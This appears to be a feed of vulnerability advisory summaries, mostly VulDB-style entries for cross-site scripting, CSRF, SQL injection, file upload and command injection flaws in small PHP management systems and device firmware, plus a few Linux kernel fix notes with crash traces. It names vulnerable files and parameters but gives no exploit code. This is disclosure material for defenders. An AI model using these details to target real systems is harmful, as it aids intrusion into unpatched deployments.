A vulnerability classified as problematic was found in Campcodes Legal Case Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/role. The manipulation of the argument slug leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263809 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Campcodes Legal Case Management System 1.0. Affected is an unknown function of the file /admin/judge. The manipulation of the argument judge_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263808.
A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/expense-type. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263807.
A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/court. The manipulation of the argument court_name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263806 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Legal Case Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/court-type. The manipulation of the argument court_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263805 was assigned to this vulnerability.
A vulnerability was found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/clients. The manipulation of the argument f_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263804.
A vulnerability has been found in Campcodes Legal Case Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/client_user. The manipulation of the argument f_name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263803.
A vulnerability, which was classified as problematic, was found in Campcodes Legal Case Management System 1.0. Affected is an unknown function of the file /admin/case-type. The manipulation of the argument case_type_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263802 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Campcodes Legal Case Management System 1.0. This issue affects some unknown processing of the file /admin/case-status. The manipulation of the argument case_status leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263801 was assigned to this vulnerability.
A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument category leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263800.
A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /model/add_student_subject.php. The manipulation of the argument index leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263799.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /model/approve_petty_cash.php. The manipulation of the argument admin_index leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263798 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /model/delete_record.php. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263797 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /model/delete_student_grade_subject.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263796.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /model/update_classroom.php. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263795.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /model/update_exam.php. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263794 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /model/update_grade.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263793 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. Affected by this issue is some unknown functionality of the file /model/update_subject.php. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263792.
A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/all_teacher.php. The manipulation of the argument page leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263791.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-8000-10 up to 20230922. This issue affects some unknown processing of the file /importhtml.php. The manipulation of the argument sql leads to deserialization. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-263747. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/conversation_history_admin.php. The manipulation of the argument conversation_id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263629 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/create_events.php. The manipulation of the argument my_index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263628.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /view/emarks_range_grade_update_form.php. The manipulation of the argument grade leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263627.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /view/exam_timetable.php. The manipulation of the argument exam leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263626 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /view/exam_timetable_grade_wise.php. The manipulation of the argument exam leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263625 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /view/exam_timetable_insert_form.php. The manipulation of the argument exam leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263624.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /view/exam_timetable_update_form.php. The manipulation of the argument exam leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263623.
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check gpio_id before used as array index [WHY &amp; HOW] GPIO_ID_UNKNOWN (-1) is not a valid value for array index and therefore should be checked in advance. This fixes 5 OVERRUN issues reported by Coverity.
A vulnerability, which was classified as critical, was found in Campcodes Legal Case Management System 1.0. Affected is an unknown function of the file /admin/general-setting of the component Setting Handler. The manipulation of the argument favicon/logo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263622 is the identifier assigned to this vulnerability.
In the Linux kernel, the following vulnerability has been resolved: codetag: debug: mark codetags for poisoned page as empty When PG_hwpoison pages are freed they are treated differently in free_pages_prepare() and instead of being released they are isolated. Page allocation tag counters are decremented at this point since the page is considered not in use. Later on when such pages are released by unpoison_memory(), the allocation tag counters will be decremented again and the following warning gets reported: [ 113.930443][ T3282] ------------[ cut here ]------------ [ 113.931105][ T3282] alloc_tag was not set [ 113.931576][ T3282] WARNING: CPU: 2 PID: 3282 at ./include/linux/alloc_tag.h:130 pgalloc_tag_sub.part.66+0x154/0x164 [ 113.932866][ T3282] Modules linked in: hwpoison_inject fuse ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 ipt_REJECT nf_reject_ipv4 xt_conntrack ebtable_nat ebtable_broute ip6table_nat ip6table_man4 [ 113.941638][ T3282] CPU: 2 UID: 0 PID: 3282 Comm: madvise11 Kdump: loaded Tainted: G W 6.11.0-rc4-dirty #18 [ 113.943003][ T3282] Tainted: [W]=WARN [ 113.943453][ T3282] Hardware name: QEMU KVM Virtual Machine, BIOS unknown 2/2/2022 [ 113.944378][ T3282] pstate: 40400005 (nZcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 113.945319][ T3282] pc : pgalloc_tag_sub.part.66+0x154/0x164 [ 113.946016][ T3282] lr : pgalloc_tag_sub.part.66+0x154/0x164 [ 113.946706][ T3282] sp : ffff800087093a10 [ 113.947197][ T3282] x29: ffff800087093a10 x28: ffff0000d7a9d400 x27: ffff80008249f0a0 [ 113.948165][ T3282] x26: 0000000000000000 x25: ffff80008249f2b0 x24: 0000000000000000 [ 113.949134][ T3282] x23: 0000000000000001 x22: 0000000000000001 x21: 0000000000000000 [ 113.950597][ T3282] x20: ffff0000c08fcad8 x19: ffff80008251e000 x18: ffffffffffffffff [ 113.952207][ T3282] x17: 0000000000000000 x16: 0000000000000000 x15: ffff800081746210 [ 113.953161][ T3282] x14: 0000000000000000 x13: 205d323832335420 x12: 5b5d353031313339 [ 113.954120][ T3282] x11: ffff800087093500 x10: 000000000000005d x9 : 00000000ffffffd0 [ 113.955078][ T3282] x8 : 7f7f7f7f7f7f7f7f x7 : ffff80008236ba90 x6 : c0000000ffff7fff [ 113.956036][ T3282] x5 : ffff000b34bf4dc8 x4 : ffff8000820aba90 x3 : 0000000000000001 [ 113.956994][ T3282] x2 : ffff800ab320f000 x1 : 841d1e35ac932e00 x0 : 0000000000000000 [ 113.957962][ T3282] Call trace: [ 113.958350][ T3282] pgalloc_tag_sub.part.66+0x154/0x164 [ 113.959000][ T3282] pgalloc_tag_sub+0x14/0x1c [ 113.959539][ T3282] free_unref_page+0xf4/0x4b8 [ 113.960096][ T3282] __folio_put+0xd4/0x120 [ 113.960614][ T3282] folio_put+0x24/0x50 [ 113.961103][ T3282] unpoison_memory+0x4f0/0x5b0 [ 113.961678][ T3282] hwpoison_unpoison+0x30/0x48 [hwpoison_inject] [ 113.962436][ T3282] simple_attr_write_xsigned.isra.34+0xec/0x1cc [ 113.963183][ T3282] simple_attr_write+0x38/0x48 [ 113.963750][ T3282] debugfs_attr_write+0x54/0x80 [ 113.964330][ T3282] full_proxy_write+0x68/0x98 [ 113.964880][ T3282] vfs_write+0xdc/0x4d0 [ 113.965372][ T3282] ksys_write+0x78/0x100 [ 113.965875][ T3282] __arm64_sys_write+0x24/0x30 [ 113.966440][ T3282] invoke_syscall+0x7c/0x104 [ 113.966984][ T3282] el0_svc_common.constprop.1+0x88/0x104 [ 113.967652][ T3282] do_el0_svc+0x2c/0x38 [ 113.968893][ T3282] el0_svc+0x3c/0x1b8 [ 113.969379][ T3282] el0t_64_sync_handler+0x98/0xbc [ 113.969980][ T3282] el0t_64_sync+0x19c/0x1a0 [ 113.970511][ T3282] ---[ end trace 0000000000000000 ]--- To fix this, clear the page tag reference after the page got isolated and accounted for.
In the Linux kernel, the following vulnerability has been resolved: mm/slub: add check for s-&gt;flags in the alloc_tagging_slab_free_hook When enable CONFIG_MEMCG &amp; CONFIG_KFENCE &amp; CONFIG_KMEMLEAK, the following warning always occurs,This is because the following call stack occurred: mem_pool_alloc kmem_cache_alloc_noprof slab_alloc_node kfence_alloc Once the kfence allocation is successful,slab-&gt;obj_exts will not be empty, because it has already been assigned a value in kfence_init_pool. Since in the prepare_slab_obj_exts_hook function,we perform a check for s-&gt;flags &amp; (SLAB_NO_OBJ_EXT | SLAB_NOLEAKTRACE),the alloc_tag_add function will not be called as a result.Therefore,ref-&gt;ct remains NULL. However,when we call mem_pool_free,since obj_ext is not empty, it eventually leads to the alloc_tag_sub scenario being invoked. This is where the warning occurs. So we should add corresponding checks in the alloc_tagging_slab_free_hook. For __GFP_NO_OBJ_EXT case,I didn't see the specific case where it's using kfence,so I won't add the corresponding check in alloc_tagging_slab_free_hook for now. [ 3.734349] ------------[ cut here ]------------ [ 3.734807] alloc_tag was not set [ 3.735129] WARNING: CPU: 4 PID: 40 at ./include/linux/alloc_tag.h:130 kmem_cache_free+0x444/0x574 [ 3.735866] Modules linked in: autofs4 [ 3.736211] CPU: 4 UID: 0 PID: 40 Comm: ksoftirqd/4 Tainted: G W 6.11.0-rc3-dirty #1 [ 3.736969] Tainted: [W]=WARN [ 3.737258] Hardware name: QEMU KVM Virtual Machine, BIOS unknown 2/2/2022 [ 3.737875] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 3.738501] pc : kmem_cache_free+0x444/0x574 [ 3.738951] lr : kmem_cache_free+0x444/0x574 [ 3.739361] sp : ffff80008357bb60 [ 3.739693] x29: ffff80008357bb70 x28: 0000000000000000 x27: 0000000000000000 [ 3.740338] x26: ffff80008207f000 x25: ffff000b2eb2fd60 x24: ffff0000c0005700 [ 3.740982] x23: ffff8000804229e4 x22: ffff800082080000 x21: ffff800081756000 [ 3.741630] x20: fffffd7ff8253360 x19: 00000000000000a8 x18: ffffffffffffffff [ 3.742274] x17: ffff800ab327f000 x16: ffff800083398000 x15: ffff800081756df0 [ 3.742919] x14: 0000000000000000 x13: 205d344320202020 x12: 5b5d373038343337 [ 3.743560] x11: ffff80008357b650 x10: 000000000000005d x9 : 00000000ffffffd0 [ 3.744231] x8 : 7f7f7f7f7f7f7f7f x7 : ffff80008237bad0 x6 : c0000000ffff7fff [ 3.744907] x5 : ffff80008237ba78 x4 : ffff8000820bbad0 x3 : 0000000000000001 [ 3.745580] x2 : 68d66547c09f7800 x1 : 68d66547c09f7800 x0 : 0000000000000000 [ 3.746255] Call trace: [ 3.746530] kmem_cache_free+0x444/0x574 [ 3.746931] mem_pool_free+0x44/0xf4 [ 3.747306] free_object_rcu+0xc8/0xdc [ 3.747693] rcu_do_batch+0x234/0x8a4 [ 3.748075] rcu_core+0x230/0x3e4 [ 3.748424] rcu_core_si+0x14/0x1c [ 3.748780] handle_softirqs+0x134/0x378 [ 3.749189] run_ksoftirqd+0x70/0x9c [ 3.749560] smpboot_thread_fn+0x148/0x22c [ 3.749978] kthread+0x10c/0x118 [ 3.750323] ret_from_fork+0x10/0x20 [ 3.750696] ---[ end trace 0000000000000000 ]---
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /view/find_friends.php. The manipulation of the argument my_type leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263599.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /view/my_student_exam_marks1.php. The manipulation of the argument year leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263598 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /view/range_grade_text.php. The manipulation of the argument count leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263597 was assigned to this vulnerability.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /view/show_events.php. The manipulation of the argument event_id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263596.
In the Linux kernel, the following vulnerability has been resolved: of/irq: Prevent device address out-of-bounds read in interrupt map walk When of_irq_parse_raw() is invoked with a device address smaller than the interrupt parent node (from #address-cells property), KASAN detects the following out-of-bounds read when populating the initial match table (dyndbg="func of_irq_parse_* +p"): OF: of_irq_parse_one: dev=/soc@0/picasso/watchdog, index=0 OF: parent=/soc@0/pci@878000000000/gpio0@17,0, intsize=2 OF: intspec=4 OF: of_irq_parse_raw: ipar=/soc@0/pci@878000000000/gpio0@17,0, size=2 OF: -&gt; addrsize=3 ================================================================== BUG: KASAN: slab-out-of-bounds in of_irq_parse_raw+0x2b8/0x8d0 Read of size 4 at addr ffffff81beca5608 by task bash/764 CPU: 1 PID: 764 Comm: bash Tainted: G O 6.1.67-484c613561-nokia_sm_arm64 #1 Hardware name: Unknown Unknown Product/Unknown Product, BIOS 2023.01-12.24.03-dirty 01/01/2023 Call trace: dump_backtrace+0xdc/0x130 show_stack+0x1c/0x30 dump_stack_lvl+0x6c/0x84 print_report+0x150/0x448 kasan_report+0x98/0x140 __asan_load4+0x78/0xa0 of_irq_parse_raw+0x2b8/0x8d0 of_irq_parse_one+0x24c/0x270 parse_interrupts+0xc0/0x120 of_fwnode_add_links+0x100/0x2d0 fw_devlink_parse_fwtree+0x64/0xc0 device_add+0xb38/0xc30 of_device_add+0x64/0x90 of_platform_device_create_pdata+0xd0/0x170 of_platform_bus_create+0x244/0x600 of_platform_notify+0x1b0/0x254 blocking_notifier_call_chain+0x9c/0xd0 __of_changeset_entry_notify+0x1b8/0x230 __of_changeset_apply_notify+0x54/0xe4 of_overlay_fdt_apply+0xc04/0xd94 ... The buggy address belongs to the object at ffffff81beca5600 which belongs to the cache kmalloc-128 of size 128 The buggy address is located 8 bytes inside of 128-byte region [ffffff81beca5600, ffffff81beca5680) The buggy address belongs to the physical page: page:00000000230d3d03 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1beca4 head:00000000230d3d03 order:1 compound_mapcount:0 compound_pincount:0 flags: 0x8000000000010200(slab|head|zone=2) raw: 8000000000010200 0000000000000000 dead000000000122 ffffff810000c300 raw: 0000000000000000 0000000000200020 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffffff81beca5500: 04 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffffff81beca5580: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc &gt;ffffff81beca5600: 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ^ ffffff81beca5680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffffff81beca5700: 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc ================================================================== OF: -&gt; got it ! Prevent the out-of-bounds read by copying the device address into a buffer of sufficient size.
A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/show_friend_request.php. The manipulation of the argument my_index leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263595.
A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. Affected by this issue is some unknown functionality of the file /view/show_student_grade_subject.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263594 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/show_student_subject.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263593 was assigned to this vulnerability.
A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/cloudInterface.php. The manipulation of the argument INSTI_CODE leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263499.
A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1 and classified as critical. Affected by this issue is some unknown functionality of the file /xds/outIndex.php. The manipulation of the argument name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263498 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/show_teacher2.php. The manipulation of the argument month leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263496.
A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/student_attendance_history1.php. The manipulation of the argument year leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263495.
A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. This vulnerability affects unknown code of the file /view/student_due_payment.php. The manipulation of the argument due_month leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263494 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/student_exam_mark_insert_form1.php. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263493 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /view/student_exam_mark_update_form.php. The manipulation of the argument std_index leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263492.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /view/student_first_payment.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263491.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /view/student_payment_details.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263490 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Prison Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /Admin/changepassword.php. The manipulation of the argument txtold_password/txtnew_password/txtconfirm_password leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263489 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Prison Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /Employee/changepassword.php. The manipulation of the argument txtold_password/txtnew_password/txtconfirm_password leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263488.
A vulnerability was found in Kimai up to 2.15.0 and classified as problematic. Affected by this issue is some unknown functionality of the component Session Handler. The manipulation of the argument PHPSESSIONID leads to information disclosure. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 2.16.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-263318 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. Affected is an unknown function of the file /src/dede/sys_safe.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263316. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. This issue affects some unknown processing of the file /src/dede/sys_multiserv.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263315. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in DedeCMS 5.7. This vulnerability affects unknown code of the file /src/dede/sys_group_edit.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263314 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/sys_group_add.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263313 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS 5.7. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /src/dede/sys_info.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263312. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS 5.7. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /src/dede/mytag_edit.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263311. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS 5.7. It has been classified as problematic. Affected is an unknown function of the file /src/dede/mytag_add.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263310 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS 5.7 and classified as problematic. This issue affects some unknown processing of the file /src/dede/tpl.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263309 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in DedeCMS 5.7 and classified as problematic. This vulnerability affects unknown code of the file /src/dede/shops_delivery.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263308. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/member_type.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263307. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Faraday GM8181 and GM828x up to 20240429. Affected by this issue is some unknown functionality of the file /command_port.ini. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263306 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Faraday GM8181 and GM828x up to 20240429. Affected by this vulnerability is an unknown functionality of the component Request Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-263305 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Faraday GM8181 and GM828x up to 20240429. Affected is an unknown function of the component NTP Service. The manipulation of the argument ntp_srv leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-263304.
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /Admin/user-record.php. The manipulation of the argument txtfullname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263131.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /view/student_payment_details2.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-263130 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /view/student_payment_details3.php. The manipulation of the argument month leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263129 was assigned to this vulnerability.
A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /view/student_payment_details4.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263128.
A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/student_payment_invoice.php. The manipulation of the argument desc leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263127.
A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. Affected by this issue is some unknown functionality of the file /view/teacher_attendance_history1.php. The manipulation of the argument year leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263126 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view/teacher_salary_details.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263125 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/teacher_salary_details2.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263124.
